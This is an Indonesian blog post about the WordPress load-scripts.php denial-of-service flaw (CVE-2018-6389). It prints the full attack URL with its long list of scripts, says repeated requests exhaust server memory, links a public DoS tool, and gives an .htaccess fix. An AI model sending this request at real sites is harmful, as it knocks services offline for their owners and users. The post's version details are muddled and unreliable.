Denial of Service atau yang biasa dipanggil DoS telah ditemukan di platform CMS WordPress yang dapat memungkinkan siapa saja untuk menghapus sebagian besar situs web WordPress bahkan dengan satu mesin tanpa memukul dengan sejumlah besar bandwidth, seperti yang diperlukan dalam jaringan -tingkat serangan DDoS untuk mencapai hal yang sama.

Karena perusahaan telah membantah menambal masalah ini, kerentanan (CVE-2018-6389) tetap belum ditambal dan mempengaruhi hampir semua versi WordPress yang dirilis dalam sembilan tahun terakhir, termasuk rilis stabil terbaru dari WordPress (Versi 5.3). Ditemukan oleh peneliti keamanan Israel bernama Barak Tawily, kerentanan berada pada “load-scripts.php,” script bawaan di CMS WordPress, memproses permintaan yang ditentukan pengguna

https://example.com/wp-admin/load-scripts.php?load=wp-polyfill,lodash,moment,wp-api-fetch,wp-data,wp-date,editor,utils,common,wp-sanitize,sack,quicktags,colorpicker,clipboard,wp-fullscreen-stub,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter

Namun, “load-scripts.php” bisa dapat diakses oleh siapa pun. Karena bisa diakses siapapun yang berarti hacker dapat mengirim request sebesar 3 atau 4MB secara berulang-ulang sehingga menghabiskan memory

wordpress-dos-attack-tool
Barak tawily dengan toolnya yaitu doser.py
"It is time to mention again that load-scripts.php does not require any authentication, an anonymous user can do so. After ~500 requests, the server didn't respond at all any more, or returned 502/503/504 status code errors," Tawily says. 

Tawily berkata andaikan hacker melakukan hingga kurang lebih 500 request maka website yang akan diserangnya tidak akan merespon atau lebih tepatnya tidak bisa diakses

Image result for 502 bad gateway"
502 Bad Gateway

Banyak tool yang telah tersebar di github.com salah satu contohnya
https://github.com/Adelittle/Wordpressz_Dos_CVE_2018_6389
Punya teman saya https://www.facebook.com/blitari31337

Post tentang script yang dibuatnya

Cara memperbaikinya

Caranya dengan menambah sedikit line di file bernama .htaccess, berikut kodenya

RewriteCond %{HTTP_REFERER} !example\.com [NC]
RewriteCond %{THE_REQUEST} \.php[\ /?].*HTTP/ [NC]
RewriteRule ^wp-admin/load-scripts\.php$ – [R=403,L]

Dengan menambah code ini maka website akan memberikan kode 403 dan orang luar tidak dapat mengakses file tersebut

Sumber:

http://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html?m=1